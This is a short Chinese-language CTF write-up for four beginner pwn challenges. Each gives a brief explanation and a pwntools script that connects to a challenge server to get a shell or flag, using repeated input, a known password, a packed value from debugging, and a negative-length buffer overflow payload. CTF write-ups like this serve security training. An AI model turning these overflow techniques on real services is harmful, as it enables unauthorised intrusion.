Game

就是不断输入1至9的数字,当输入的数字的和大于999时获得shell。

from pwn import*
io=remote('61.139.2.1',57621)

for _ in range(120):
    io.sendline(b'9')

io.interactive()

Real_Login

简单的签到题目,输入的字符串与程序设定的password一样就能获得shell。

from pwn import*
io=remote('61.139.2.1',59414)

io.sendlineafter('your input: ',b'NewStar!!!')

io.interactive()

gdb

该程序先对字符串进行加密,用户再输入字符串并进行对比,若一致则获得flag。

使用gdb进行调试。

from pwn import*
io=remote('61.139.2.1',63397)

io.sendlineafter('data: ',p64(0x4557455355431d5d))

io.interactive()

overwrite

简单的pwn题目

from pwn import*
io=remote('61.139.2.1',50104)

io.sendlineafter('readin: ',b'-1')
payload=b'a'*0x30+b'114515'
io.sendafter('say: ',payload)

io.interactive()